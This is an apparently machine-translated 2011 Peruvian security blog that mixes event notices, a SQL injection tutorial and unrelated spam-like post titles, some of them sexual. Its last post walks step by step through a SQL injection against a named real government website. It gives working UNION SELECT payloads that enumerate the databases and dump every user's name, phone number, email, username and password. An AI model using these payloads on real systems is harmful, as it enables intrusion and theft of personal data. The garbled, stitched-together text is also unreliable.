Wednesday, February 23, 2011

Alkaline Battery In The Cold

Solution Xubuntu challenge


Hello, to all who have been registered to LimaHack @ UNMSM I must inform you that for capacity reasons we changed the venue. Now be held in the auditorium School of Accounting of San Marcos University (third floor).

Those who have not been able to register on time or are out of Lima can view the conference via live Internet streaming. We're working on it and will soon post the streaming channel.

We are still evaluating whether to open more vacancies, stay tuned for new announcements
. Despite its new location and more space

A greeting.

Monday, February 21, 2011

How To Wash Sanuks In The Washing Machine

New place for LimaHack @ UNMSM





To:

Engineering professionals interested in learning and / or update their knowledge on the methodologies used in forensic engineering, professionals in information technology, team members incident response managers, information security, lawyers, engineers, systems analysts coroners, police, public ministry, anyone interested in computer forensics investigations and computer security.



Defining the role of the forensic engineering investigation of the crime scene, through the knowledge of the procedures performed in forensic analysis of accidents and computer crime.


Instructors:


Chemical Engineering

Domingo A. Santiago Figueroa
forensic experts
Official Criminalistica area Forensic Analyst Information Security Expert
Eng Informatico (tbc)

Agenda:

Forensic Engineering
Accident Damages and
Technical Report Process and Product.
Engineering Computer Forensics Computer Forensics
digital evidence analysis

Day:
Monday February 28, 2011
Time: 17:00 to 19 hours

  • Location: University
  • Mayor de San Marcos National
  • Faculty of Law at the Universidad Nacional Mayor de San Marcos, Room 252
Registration:
http://www.facebook.com/sedeforense
Telephone: 2705163
Mobile Phone: 991435643



Organizers: Forensic Research Institute - Headquarters

Peru Sponsor: Student Third Faculty of Law at the Universidad Nacional Mayor de San Marcos
FREE INCOME - PRIOR REGISTRATION

Certification:

General public 20 new soles Course Students of Criminology 10 soles

banker: National Bank
Head / Head: Forensic Research Institute The certificate will be delivered to the end of the seminar .

Saturday, February 19, 2011

Why Does A Dog Have Mucus In Her Poop

PERT / CPM methods

Thursday, February 17, 2011

Close Up Of Man Ejaculating Into A Woman

Engineering Seminar Forensic Computer Crime Seminar

Hello friends, I have another interesting event on computer security to be held this week.
To:
Students, professionals and technical systems engineering, information security and interested in computer security and standards security.
Objective: To provide security specialists and computer science in general, knowledge on protection techniques and computer incident response.

Instructor: Walter Zubeleta
Rojas

Security Analyst teacher at the school for officers of the National Police of Peru
Criminology Maestrista

Agenda:
Social History of Engineering

Monitoring Intrusion Backdoor's Tools computer security incident response
  • Cybercrime in Peru
  • attacks and countermeasures techniques
    Held
  • Faculty of Law at the Universidad Nacional Mayor de San Marcos, Room 303
Day:
Saturday February 19, 2011
Time: 10:00 a.m. to 14:00
hours

Registration:
http://www.facebook.com/
sedeforense
http://www.twitter.com/sedeforense
Information and registration:

sedeforense@hotmail.com
eventos@sedeforense.edu.pe
Phone: 2705163
Phone: 991435643
(Opening hours Monday to Friday DE10: 00 am to 17:00 pm)

Organizers: Institute of Forensic Research - See Peru
Sponsor: Omni System's SAC
FREE INCOME - PRIOR REGISTRATION

Certification :

General public 20 new soles
CSI Students 10 nuevos soles
banker: Banco de la Nación
Current Account No.: 00-015-009950
Responsible / Owner: Institute of Forensic Research
A greeting. See you soon.

Rebuild Retaining Wall

: Hacking Social Engineering to Defacing



Today, I just confirmed that the CBC will be a day of LimaHack @ UNMSM
as part of the activities planned for that day.
What is the CBC's LimaHack?
The CTF is a challenge that will test your knowledge about computers and hacking. The CTF will simulate a real scenario you want to find vulnerabilities and exploit to solve the challenge. Consist of 4 races and will run from 9:30 to 1:30 (in parallel with the conference). At the end of the conference will present the solution.
What do I need to participate?


Participation in the CBC is totally free. To participate you need to bring your laptop and that this support WIFI connections. You can use the operating system and software tools to consider necessary. As a suggestion use any distribution to security audit and backtrack.



series not forget to register your laptop to go to college.
    "I can interact in a team?
  • Yes, you can participate alone or in teams of up to 3 members.
  • Will there be prizes for the winners?
Yes, the prize consists of a glass plate, mentioning the event and will give the team that reaches further.
If you
interested in participating,

register your team here:
http://sistemas.edu.pe/component/forme/?fid=2
A greeting ... we are 26:)

Tuesday, February 15, 2011

Rabbit Hutch Animated Clipart

Wargame LimaHack LimaHack @ @ UNMSM

long time ago since I talked to the friend w1b1 fataku about why he had not attended the LimaHack 2010 to be held in December last year. I also attended and the reason was that we did not know in time. In this talk, fataku also told that if we organized in our power, could repeat the event there.
was an opportunity we could not miss. So With the support of some teachers of the faculty and enthusiastic group always managed to give San Marcux we date the LimaHack @ UNMSM.
All are invited. Here is the poster of the event (click on image for full size)

REGISTRATION CLOSED. THANKS FOR THE WELCOME.

A greeting. We welcome you LimaHack @ UNMSM

Sunday, February 13, 2011

Example Church Welcome Letter

UNMSM Web SQL Injection Attacks

Web SQL Injection Attacks [Part I]

Web SQL Injection Attacks [Part II]
Web SQL Injection Attacks [Party III]
Now that we know what is a SQLi we continue to detect this vulnerability in a website.

SQLi 5 Searching vulnerabilities.
SQLi Earlier we saw that one occurs when the web application form SQL queries by concatenating parameters, we send you, without validating properly. To these parameters we will call the web application inputs. The first step to detect a SQLi will identify all the inputs it receives the application. To do remember that tickets are sent using GET and POST methods of HTTP. See more details these methods.

The GET method is commonly used for any resource request via HTTP. If you want to send parameters using this method, they will in the URL after the question mark "?" and therefore are visible and easy to change from your browser.
GET / test / index.php? Page = news & id = 1 HTTP/1.1 Host
:
localhost User-Agent: Mozilla/5.0 (Ubuntu 10.10)
Accept: text / html


This is a HTTP request example using the GET method to request the resource / test / index.php page = parameter passing news and id = 1. You can also see the Host header, User-Agent and Accept that provide additional information on the application. The POST method is quite similar, but unlike GET is used to send information to the server (commonly forms). It does not send the data in the URL but it uses the HTTP message body so it can send as much information. Send data "hidden", ie a normal user can not view or modify them so easily.
POST / test / index.php HTTP/1.1 Host : localhost User-Agent: Mozilla/5.0 (Ubuntu 10.10) Accept: text / html
Content-Type: application / x-www-form-urlencoded
Content-Length: 14
page = news & id = 1
The example shows an HTTP POST request that sends data to / test / index.php. The data goes to the bottom. In the headers we see the Content-Type specifies that in this case we are sending a form and the Content-Length indicates the number of characters of data sent. After the headers is a blank line as a separation and ultimately we want to send data.
addition to the parameters sent by GET or POST, other areas that can be used to inject SQL code are some headers like: Cookie, User-Agent, Referer, or Host. The HTTP headers provide additional information on the application, go to one per line and have the form "Header: value." For example, the Cookie header is used to identify the user's session, some web applications store their value in the database, along with other data in the session, and then use it to retrieve data. There could therefore be vulnerable to SQL injection. User-Agent header to the server tells your browser and operating system, Referer indicates the URL of the page you were viewing when making the request and Host, domain name web site requested. All these data could be used for statistical purposes and its value to be stored in a database. Therefore we must also consider in our analysis. ZAP
5.1, a tool for automated detection.
Well now we know the areas we can use to test a SQLi, the next step is to modify the values \u200b\u200bof the data sent seeking to generate an error or figure out if we can change the SQL query. We are going to use a tool called Proxy Attack Zed (ZAP) which can be downloaded from the following link:

http://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
ZAP serves as a proxy , an intermediary between your browser and web server, so all data exchange and this goes for ZAP puede analizarlo y descubrir muchos tipos de vulnerabilidades. Cuenta con herramientas muy útiles que nos permiten escanear puertos, escanear vulnerabilidades, encontrar recursos mediante crawling o por fuerza bruta, modificar los mensajes HTTP/HTTPS en ambos sentidos de la comunicación, entre otros. ZAP está hecho en java así que para correrlo en nuestro equipo necesitaremos tener instalado el interprete de java.
Instalar ZAP en linux es bastante sencillo. Primero creamos una carpeta y lo descomprimimos ahí
mkdir zaproxy
tar -xzvf ZAP_1.2.0_Linux.tar.gz -C zaproxy
Luego nos ubicamos dentro de la carpeta y le damos permisos de ejecución al script zap.sh

zaproxy cd chmod + x zap.sh
ZAP
Finally run the script
. / Zap.sh


To set the listening port where we click on the ZAP Tools menu and click Options. Select the option Local proxy and change the port that we want.

ZAP is now ready. Now just configure your browser to use a proxy ZAP.

From now on all the pages you visit will be captured by ZAP to analyze them later.
An example of use. Looking with google, did not take long to find pages that receive parameters in the URL. In my case looked like this: inurl: "id =" "library"

One outcome was as follows: Le
clicking and now reviewed what ZAP has captured the History tab in the lower right pane.

As we can see, ZAP has registered the application. If we click on Registration, eyelashes "Request" and "Response" on the top panel we see the HTTP request and response respectively. The other tab "Break" is used to modify HTTP messages but we will see later.

Now for vulnerabilities scanner, right click on the registration and click "Scan this history." ZAP start scanning the tab "Active Scan".


ZAP SQL injections can detect parameters passed by both GET and POST but apparently does not test the HTTP headers. To make a manual testing of these fields is very useful the "break." The you will be asked if you want to modify the HTTP messages both inbound and outbound, ie HTTP requests and responses. To activate this option just have to click on the button "Set Break" (green circle) on top.
For concatenation
In a SQL query values text, unlike the numerical need quotation marks. For example:
SELECT * FROM news WHERE category = 'Sports'

The string "sports" is given in single quotes. The php script to make the above query would be something like this: //...

 $ cat = $ _GET ['cat']; 
$ query = "SELECT * FROM news WHERE category = '". $ Cat. "'";
//...


Note that the value of the variable
"$ cat"
is inserted between two single quotes. Then the call from the browser would be:

http://ejemplo.com/news.php?cat=deportes
 


To modify a SQL command so formed, will have to close the quote that appears first with another quote and comment on that comes later. That is, the call to the page would be:



http://ejemplo.com/news.php?cat=deportes' or 1 = 1 -

With what the resulting query will look like this:

SELECT * FROM news WHERE category = 'Sports' or 1 = 1 -'

We can clearly see that we inject a "or 1 = 1" .

One way to test injections in text fields is by concatenation. That is, will be the same select news
in category "sports" and
"depo" + "rts" . Since
to concatenate strings "deposition" and
"rts" forms

"sports"
. The syntax depends on SQL dialect concatenation of different data base management (MySQL, Oracle, SQL Sever, etc). In the case of MySQL is as follows:

 SELECT * FROM news WHERE category = 'deposited' 'rts' 

enough that the chains are separated by a space.
Then the call to the web page would read:

 
http://ejemplo.com/news.php?cat=depo '+' rts



Remember that the sign "+" in the URL
 indicates a blank space, you can also use the hexadecimal representation of space, which is "
% 20"
as well: http:/

If these latest calls produce the same result as the original call can deduce that the chain is being made and therefore the application is vulnerable to SQLi.


When the value is inserted into the SQL query we can use some numerical operations arithmetic to derive a SQLi. For example:

http://ejemplo.com/news.php?id=10


Suppose the previous call identifier shows the news with number 10 within the database. Ie forms a query like this:


news SELECT * FROM WHERE id = 10


If we change the value of id to
"10-1" and
:

http://ejemplo. com / news.php? id = 10-1
and select the news with ID 9, we can deduce that the subtraction operation is running and that the application is vulnerable. You can also make the addition operation but remember that
sign "+"
in the URL means a blank space so it is better to use hexadecimal representation
"% 2b"
well:

http://ejemplo.com/ news.php? id = 10% 2b1
Another interesting operation is the division between zero since this operation is not mathematically defined. Example:

http://ejemplo.com/news.php?id=10/0
When MySQL has to operate a division by zero returns NULL and does not select any records. We can identify what happens when the web site responds with a Generic error or a message "No results were found."

For comments

This will insert a comment in the query without disturbing it. If no errors occur or does not change the result then we conclude that our comment has been accepted and that the application is vulnerable.
These tests can also be used to determine which form of comment is accepted and used later in the operation.

Some forms are

http://ejemplo.com/news.php?id=10--comentario

http://ejemplo.com/news.php?id=10/ * comment

http://ejemplo.com/news.php?id=10 # comment

 http://ejemplo.com/news.php?id=10% 23comentario 

http:// ejemplo.com / news.php? cat = deportes' - comment
 

http://ejemplo.com/news.php?cat=deportes' / * comment


http://ejemplo.com/ news.php? cat = sports '# comment
http://ejemplo.com/news.php?cat=deportes'% 23comentario
For logical operations

is to amend the logical result of the WHERE clause using contradictions (result is always false) or tautology (always true result) and then observe the behavior of the web and figure out if it is vulnerable.


The WHERE clause is part of the SQL statement where records are conditioned to be selected. For example:
 
SELECT * FROM news WHERE cat = 'Sports' AND author = 'Juan Perez'

The conditions are that the column "cat" equals "sports" and column "author" is equal "John Doe".

Imagine the way this consultation call is as follows:
http://ejemplo.com/news.php?cat=deportes&autor=Juan+Perez We can generate a tautology in this way: http://ejemplo.com/news.php?cat=deportes&autor=Juan+Perez '+ or +''='

 Since the query would read: 

news SELECT * FROM WHERE cat = 'Sports' AND author = 'John Doe' or''=''



The
"OR''=''" causes the result WHERE is always true. In response to this the web would show all records from the news.

This form of injection is also used to skip some login forms, putting in
password field "'or''='" . Since the same effect: SELECT * FROM users WHERE username = 'admin' AND password =''or''=''

by contradiction The test seeks to do the opposite: make the WHERE clause throws always false and therefore not selected any results. For example:

http://ejemplo.com/news.php?id=10+and+1=0

This call will take the query as follows: SELECT * FROM news WHERE id = 10 and 1 = 0

So now the WHERE will always be false and not selected registration. In response should see an error page, a message indicating no results or just an empty space where once appeared content.
For errors


A quite simply whether we can alter the SQL query is generating a syntax error. We can accomplish this in both text and numeric fields including a simple quotation. Let's see:
 

http://ejemplo.com/news.php?cat = 'sports
SELECT * FROM news WHERE cat = sports'''
http://ejemplo.com/news. php? id = '10

SELECT * FROM news
WHERE id = '10 In both cases the query is malformed and see a syntax error like this:

You Have an error in your SQL syntax; check the manual That corresponds to your MySQL server version for the right syntax to use near''10 'at line 1
Though not always
PHP is configured to show the errors of the database and we could see a blank page, an error page or back to an empty space .

Well, so far the second half. Maybe I'm omitting some forms of testing because of forgetfulness or ignorance. If you know any feel free to comment;)
Regards, until next time ...

Thursday, February 3, 2011

Sealing Concrete Bathtub

[Part II] SQL Injection in www.mintra.gob.pe


a couple of days ago while searching for some examples for the second part of the series' Web SQL Injection Attacks "(which I hope to publish soon), I came across a SQLi on the website xD labor ministry

The URL in question is this:

http://www.mintra.gob.pe/mostrarTupa.php?codTupa=23


As there is still the second part, we will advance the dessert and explain how I found this SQLi.
can see in the URL you send a single parameter: "codTupa = 23" . So who tested this. The first test will put a single quote, this with the intention of creating a syntax error in the query. Let's see:
http://www.mintra.gob.pe/mostrarTupa.php?codTupa = '
As a result shows a blank page. This may be because it generated the php syntax error and is set to not display errors. Although it could also be another kind of error as incorrect data type.

To be sure we will do another test. It is to generate a tautology (always true condition) and try to list all the records.
http://www.mintra.gob.pe/mostrarTupa.php?codTupa=23 or 1 = 1
As a result we get an Internal Server Error. Perhaps it is because the number of records selected is too large.

At this point it is too suspicious but we have not proven anything. Let's do a last test, we generate a contradiction:
http://www.mintra.gob.pe/mostrarTupa.php?codTupa=23 and 1 = 1


http://www .mintra.gob.pe / mostrarTupa.php? codTupa = 23 and 1 = 0
 

With
"and 1 = 1"
page does not change, the condition still has the same value. But when we switched to
"and 1 = 0"
generates a contradiction, the condition will always be false and did not select any records. The result shows a message saying:
"no matches found"



With that we have proven that there is vulnerability.

Now let's play a little xD The first thing to do to exploit a SQLi is to determine the number of columns being selected in the query. For this we use the ORDER BY clause

showing respect to which column to sort the result. Let's see:
 

http://www.mintra.gob.pe/mostrarTupa.php?codTupa=23 order by 1 (sorted by the first column)

http://www.mintra.gob.pe/mostrarTupa . php? codTupa = 23 order by 2 (sorted by the second column)

 
http://www.mintra.gob.pe/mostrarTupa.php?codTupa=23 order by 3 (order by the third column )

...



And so will increase the number of the column to produce error. The error will occur when the column number exceeds the number of columns. Doing it this way you will take some time when selecting many columns. Normally uses a binary search strategy is much more efficient. Let's see:
 

http://www.mintra.gob.pe/mostrarTupa.php?codTupa=23 order by 10 (OK)

http://www.mintra.gob.pe/mostrarTupa.php ? codTupa = 23 order by 20 (Error)
http://www.mintra.gob.pe/mostrarTupa.php?codTupa=23 order by 15 (OK)

http://www.mintra .gob.pe / mostrarTupa.php? codTupa = 23 order by 17 (OK)
http://www.mintra.gob.pe/mostrarTupa.php?codTupa=23 order by 18 (Error)
 

thus can conclude who are selecting 17 columns.
Then we find out which of the selected columns are displayed on the website. We will use UNION SELECT
 this: 

http://www.mintra.gob.pe/mostrarTupa.php?codTupa=23 and 1 = 0 union select 1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17% 23
The
"and 1 = 0"
serves to cancel the original query and select only the numbers 1 through 17. The idea is to look after those numbers which appear on the website. The
"% 23"
going to end
is the character "#"
encoded hexadecimal and serves to discuss what comes next, if you try removing it will bounce a mistake.
can also use "-"
for comment. In the picture we see the distribution of selected columns.
Now choose any column and use it to extract information from the database. For example, I will choose the column 16. To determine the version of MySQL we may do this query:


http://www.mintra.gob.pe/mostrarTupa.php?codTupa=23 and 1 = 0 union select 1,2,3,4,5,6 , 7,8,9,10,11,12,13,14,15, version (), 17% 23



version is 5.0.77 . Similarly we can get the username of the database by calling the function
current_user ()
Now some queries a bit more interesting. If you'd like to know the names of the available databases would we do a query to the table
"schemata"
of
database "information_schema"
this:

http://www.mintra.gob. pe / mostrarTupa.php? codTupa =- 1 + union + select +1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, schema_name, 17 + from + information_schema.schemata% 23
Well as you can see there are 3 available databases: information_schema, DB_PAGWEB and TEST. The most interest seems to be
DB_PAGWEB
, so consult with boards containing:


Table "tables" of information_schema stores the name of all tables but only select those that belong to
"0x44425F504147574542"
is
"DB_PAGWEB" coded
in hexadecimal. I did this because when I put the name of the database in single quotation marks boot error. Well, that's one way to avoid the quotes;)
There are many tables, but I think the most interesting is
"PWTBC_USUARIO" . List the names of the columns of this table:
http://www.mintra.gob.pe/mostrarTupa.php?codTupa=-1+union+select+1, 2,3,4,5,6 , 7,8,9,10,11,12,13,14,15, column_name, 17 + from + INFORMATION_SCHEMA.COLUMNS + WHERE + TABLE_SCHEMA = 0x44425F504147574542 + and + table_name = 0x50575442435F5553554152494F% 23

This time we asked
table "columns" and again use hexadecimal representation of the names of the database "DB_PAGWEB" and Table "PWTBC_USUARIO" to avoid quotes.

Well, now that we know the names of the database table and columns, make a list of all user information
xD http://www.mintra.gob.pe/ mostrarTupa.php? codTupa =- 1 + union + select +1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, concat% 28I_CODUSU, 0x3A, V_NOMBREUSU , 0x3A, V_APEMATUSU, 0x3A, V_APEPATUSU, 0x3A, V_EMAIL, 0x3A, V_NUMCEL, 0x3A, V_NUMTEL, 0x3A, V_USUARIO, 0x3A, V_PASUSU% 29.17 + from + PWTBC_USUARIO% 23



And there you have them ... names, phone numbers, email, username and password for all web users xD
's all for now ... a greeting and goodbye.